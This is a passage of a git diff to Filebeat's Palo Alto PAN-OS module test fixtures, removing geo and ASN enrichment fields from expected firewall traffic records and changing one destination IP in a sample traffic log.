-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "152.195.55.192",
         "destination.nat.ip": "152.195.55.192",
@@ -3471,13 +3240,6 @@
         "client.nat.port": 44087,
         "client.port": 53025,
         "destination.address": "152.195.55.192",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "152.195.55.192",
         "destination.nat.ip": "152.195.55.192",
@@ -3576,13 +3338,6 @@
         "client.nat.port": 15915,
         "client.port": 53026,
         "destination.address": "152.195.55.192",
-        "destination.as.number": 15133,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "152.195.55.192",
         "destination.nat.ip": "152.195.55.192",
@@ -3681,13 +3436,6 @@
         "client.nat.port": 41165,
         "client.port": 53041,
         "destination.address": "151.101.2.2",
-        "destination.as.number": 54113,
-        "destination.as.organization.name": "Fastly",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "151.101.2.2",
         "destination.nat.ip": "151.101.2.2",
@@ -3786,17 +3534,7 @@
         "client.nat.port": 54133,
         "client.port": 53040,
         "destination.address": "54.192.7.152",
-        "destination.as.number": 16509,
-        "destination.as.organization.name": "Amazon.com, Inc.",
-        "destination.geo.city_name": "Seattle",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 47.6109,
-        "destination.geo.location.lon": -122.3303,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-WA",
-        "destination.geo.region_name": "Washington",
         "destination.ip": "54.192.7.152",
         "destination.nat.ip": "54.192.7.152",
         "destination.nat.port": 443,
@@ -3894,17 +3632,7 @@
         "client.nat.port": 8485,
         "client.port": 53093,
         "destination.address": "52.4.120.175",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "52.4.120.175",
         "destination.nat.ip": "52.4.120.175",
         "destination.nat.port": 443,
@@ -4002,17 +3730,7 @@
         "client.nat.port": 12496,
         "client.port": 53094,
         "destination.address": "52.4.120.175",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "52.4.120.175",
         "destination.nat.ip": "52.4.120.175",
         "destination.nat.port": 443,
@@ -4110,17 +3828,7 @@
         "client.nat.port": 17029,
         "client.port": 53095,
         "destination.address": "52.4.120.175",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "52.4.120.175",
         "destination.nat.ip": "52.4.120.175",
         "destination.nat.port": 443,
@@ -4218,17 +3926,7 @@
         "client.nat.port": 23696,
         "client.port": 53096,
         "destination.address": "52.4.120.175",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "52.4.120.175",
         "destination.nat.ip": "52.4.120.175",
         "destination.nat.port": 443,
@@ -4326,17 +4024,7 @@
         "client.nat.port": 34769,
         "client.port": 53097,
         "destination.address": "52.4.120.175",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "52.4.120.175",
         "destination.nat.ip": "52.4.120.175",
         "destination.nat.port": 443,
@@ -4434,17 +4122,7 @@
         "client.nat.port": 22486,
         "client.port": 53099,
         "destination.address": "52.4.120.175",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "52.4.120.175",
         "destination.nat.ip": "52.4.120.175",
         "destination.nat.port": 443,
@@ -4542,17 +4220,7 @@
         "client.nat.port": 12894,
         "client.port": 53100,
         "destination.address": "52.4.120.175",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "52.4.120.175",
         "destination.nat.ip": "52.4.120.175",
         "destination.nat.port": 443,
@@ -4650,17 +4318,7 @@
         "client.nat.port": 62348,
         "client.port": 53101,
         "destination.address": "52.4.120.175",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "52.4.120.175",
         "destination.nat.ip": "52.4.120.175",
         "destination.nat.port": 443,
@@ -4758,17 +4416,7 @@
         "client.nat.port": 6224,
         "client.port": 53104,
         "destination.address": "52.4.120.175",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "52.4.120.175",
         "destination.nat.ip": "52.4.120.175",
         "destination.nat.port": 443,
@@ -4866,17 +4514,7 @@
         "client.nat.port": 44120,
         "client.port": 53107,
         "destination.address": "52.4.120.175",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "52.4.120.175",
         "destination.nat.ip": "52.4.120.175",
         "destination.nat.port": 443,
@@ -4974,17 +4612,7 @@
         "client.nat.port": 44228,
         "client.port": 53108,
         "destination.address": "52.4.120.175",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "52.4.120.175",
         "destination.nat.ip": "52.4.120.175",
         "destination.nat.port": 443,
@@ -5082,17 +4710,7 @@
         "client.nat.port": 31322,
         "client.port": 53109,
         "destination.address": "52.4.120.175",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "52.4.120.175",
         "destination.nat.ip": "52.4.120.175",
         "destination.nat.port": 443,
@@ -5190,17 +4808,7 @@
         "client.nat.port": 1672,
         "client.port": 53118,
         "destination.address": "216.58.194.98",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.city_name": "Mountain View",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.3861,
-        "destination.geo.location.lon": -122.0839,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-CA",
-        "destination.geo.region_name": "California",
         "destination.ip": "216.58.194.98",
         "destination.nat.ip": "216.58.194.98",
         "destination.nat.port": 443,
@@ -5298,13 +4906,6 @@
         "client.nat.port": 20801,
         "client.port": 53126,
         "destination.address": "23.72.145.245",
-        "destination.as.number": 16625,
-        "destination.as.organization.name": "Akamai Technologies, Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "23.72.145.245",
         "destination.nat.ip": "23.72.145.245",
@@ -5403,13 +5004,6 @@
         "client.nat.port": 24533,
         "client.port": 53127,
         "destination.address": "23.72.145.245",
-        "destination.as.number": 16625,
-        "destination.as.organization.name": "Akamai Technologies, Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "23.72.145.245",
         "destination.nat.ip": "23.72.145.245",
@@ -5508,13 +5102,6 @@
         "client.nat.port": 30150,
         "client.port": 53128,
         "destination.address": "23.72.145.245",
-        "destination.as.number": 16625,
-        "destination.as.organization.name": "Akamai Technologies, Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "23.72.145.245",
         "destination.nat.ip": "23.72.145.245",
@@ -5613,13 +5200,6 @@
         "client.nat.port": 36305,
         "client.port": 53129,
         "destination.address": "23.72.145.245",
-        "destination.as.number": 16625,
-        "destination.as.organization.name": "Akamai Technologies, Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "23.72.145.245",
         "destination.nat.ip": "23.72.145.245",
@@ -5718,13 +5298,6 @@
         "client.nat.port": 42682,
         "client.port": 53130,
         "destination.address": "23.72.145.245",
-        "destination.as.number": 16625,
-        "destination.as.organization.name": "Akamai Technologies, Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "23.72.145.245",
         "destination.nat.ip": "23.72.145.245",
@@ -5823,13 +5396,6 @@
         "client.nat.port": 22530,
         "client.port": 53131,
         "destination.address": "23.72.145.245",
-        "destination.as.number": 16625,
-        "destination.as.organization.name": "Akamai Technologies, Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "23.72.145.245",
         "destination.nat.ip": "23.72.145.245",
@@ -5928,13 +5494,6 @@
         "client.nat.port": 43713,
         "client.port": 53132,
         "destination.address": "23.72.145.245",
-        "destination.as.number": 16625,
-        "destination.as.organization.name": "Akamai Technologies, Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "23.72.145.245",
         "destination.nat.ip": "23.72.145.245",
@@ -6033,13 +5592,6 @@
         "client.nat.port": 60608,
         "client.port": 53133,
         "destination.address": "23.72.145.245",
-        "destination.as.number": 16625,
-        "destination.as.organization.name": "Akamai Technologies, Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "23.72.145.245",
         "destination.nat.ip": "23.72.145.245",
@@ -6138,13 +5690,6 @@
         "client.nat.port": 9302,
         "client.port": 53134,
         "destination.address": "23.72.145.245",
-        "destination.as.number": 16625,
-        "destination.as.organization.name": "Akamai Technologies, Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "23.72.145.245",
         "destination.nat.ip": "23.72.145.245",
@@ -6243,13 +5788,6 @@
         "client.nat.port": 11634,
         "client.port": 53135,
         "destination.address": "23.72.145.245",
-        "destination.as.number": 16625,
-        "destination.as.organization.name": "Akamai Technologies, Inc.",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.geo.name": "United States",
         "destination.ip": "23.72.145.245",
         "destination.nat.ip": "23.72.145.245",
@@ -6348,17 +5886,7 @@
         "client.nat.port": 30818,
         "client.port": 53152,
         "destination.address": "54.209.101.70",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "54.209.101.70",
         "destination.nat.ip": "54.209.101.70",
         "destination.nat.port": 443,
@@ -6456,17 +5984,7 @@
         "client.nat.port": 64260,
         "client.port": 53155,
         "destination.address": "54.209.101.70",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "54.209.101.70",
         "destination.nat.ip": "54.209.101.70",
         "destination.nat.port": 443,
@@ -6564,17 +6082,7 @@
         "client.nat.port": 7071,
         "client.port": 53158,
         "destination.address": "54.209.101.70",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "54.209.101.70",
         "destination.nat.ip": "54.209.101.70",
         "destination.nat.port": 443,
@@ -6672,17 +6180,7 @@
         "client.nat.port": 4512,
         "client.port": 53160,
         "destination.address": "54.209.101.70",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "54.209.101.70",
         "destination.nat.ip": "54.209.101.70",
         "destination.nat.port": 443,
@@ -6780,17 +6278,7 @@
         "client.nat.port": 3422,
         "client.port": 53161,
         "destination.address": "54.209.101.70",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "54.209.101.70",
         "destination.nat.ip": "54.209.101.70",
         "destination.nat.port": 443,
@@ -6888,17 +6376,7 @@
         "client.nat.port": 4651,
         "client.port": 53162,
         "destination.address": "54.209.101.70",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "54.209.101.70",
         "destination.nat.ip": "54.209.101.70",
         "destination.nat.port": 443,
@@ -6996,17 +6474,7 @@
         "client.nat.port": 19068,
         "client.port": 53163,
         "destination.address": "54.209.101.70",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "54.209.101.70",
         "destination.nat.ip": "54.209.101.70",
         "destination.nat.port": 443,
@@ -7104,17 +6572,7 @@
         "client.nat.port": 5831,
         "client.port": 53164,
         "destination.address": "54.209.101.70",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "54.209.101.70",
         "destination.nat.ip": "54.209.101.70",
         "destination.nat.port": 443,
@@ -7212,17 +6670,7 @@
         "client.nat.port": 7084,
         "client.port": 53165,
         "destination.address": "54.209.101.70",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "54.209.101.70",
         "destination.nat.ip": "54.209.101.70",
         "destination.nat.port": 443,
@@ -7320,17 +6768,7 @@
         "client.nat.port": 18633,
         "client.port": 53166,
         "destination.address": "54.209.101.70",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "54.209.101.70",
         "destination.nat.ip": "54.209.101.70",
         "destination.nat.port": 443,
@@ -7428,17 +6866,7 @@
         "client.nat.port": 25557,
         "client.port": 53167,
         "destination.address": "54.209.101.70",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "54.209.101.70",
         "destination.nat.ip": "54.209.101.70",
         "destination.nat.port": 443,
@@ -7536,17 +6964,7 @@
         "client.nat.port": 20661,
         "client.port": 53150,
         "destination.address": "54.209.101.70",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "54.209.101.70",
         "destination.nat.ip": "54.209.101.70",
         "destination.nat.port": 443,
@@ -7644,17 +7062,7 @@
         "client.nat.port": 65438,
         "client.port": 53185,
         "destination.address": "54.209.101.70",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "54.209.101.70",
         "destination.nat.ip": "54.209.101.70",
         "destination.nat.port": 443,
@@ -7752,17 +7160,7 @@
         "client.nat.port": 53101,
         "client.port": 53187,
         "destination.address": "54.209.101.70",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "54.209.101.70",
         "destination.nat.ip": "54.209.101.70",
         "destination.nat.port": 443,
@@ -7860,17 +7258,7 @@
         "client.nat.port": 35463,
         "client.port": 53188,
         "destination.address": "54.209.101.70",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "54.209.101.70",
         "destination.nat.ip": "54.209.101.70",
         "destination.nat.port": 443,
@@ -7968,17 +7356,7 @@
         "client.nat.port": 45769,
         "client.port": 53178,
         "destination.address": "54.209.101.70",
-        "destination.as.number": 14618,
-        "destination.as.organization.name": "Amazon.com, Inc.",
-        "destination.geo.city_name": "Ashburn",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 39.0481,
-        "destination.geo.location.lon": -77.4728,
         "destination.geo.name": "United States",
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
         "destination.ip": "54.209.101.70",
         "destination.nat.ip": "54.209.101.70",
         "destination.nat.port": 443,
diff --git a/x-pack/filebeat/module/panw/panos/test/traffic.log b/x-pack/filebeat/module/panw/panos/test/traffic.log
index c3e74310f06b..6d84c3bc5707 100644
--- a/x-pack/filebeat/module/panw/panos/test/traffic.log
+++ b/x-pack/filebeat/module/panw/panos/test/traffic.log
@@ -1,87 +1,87 @@
 Nov 30 16:09:08 PA-220 1,2018/11/30 16:09:07,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:07,192.168.15.207,184.51.253.152,192.168.1.63,184.51.253.152,new_outbound_from_trust,,,apple-maps,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:07,22751,1,55113,443,16418,443,0x400053,tcp,allow,7734,1758,5976,36,2018/11/30 15:59:04,586,computer-and-internet-info,0,32091112,0x0,192.168.0.0-192.168.255.255,United States,0,16,20,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
-Nov 30 16:09:10 PA-220 1,2018/11/30 16:09:09,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:09,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24223,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:08:55,0,any,0,32091113,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
+Nov 30 16:09:10 PA-220 1,2018/11/30 16:09:09,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:09,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24223,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:08:55,0,any,0,32091113,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
 Nov 30 16:09:10 PA-220 1,2018/11/30 16:09:09,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:09,192.168.15.207,17.253.3.202,192.168.1.63,17.253.3.202,new_outbound_from_trust,,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24138,1,55114,80,51990,80,0x40001c,tcp,allow,1574,539,1035,11,2018/11/30 16:08:51,1,computer-and-internet-info,0,32091114,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0
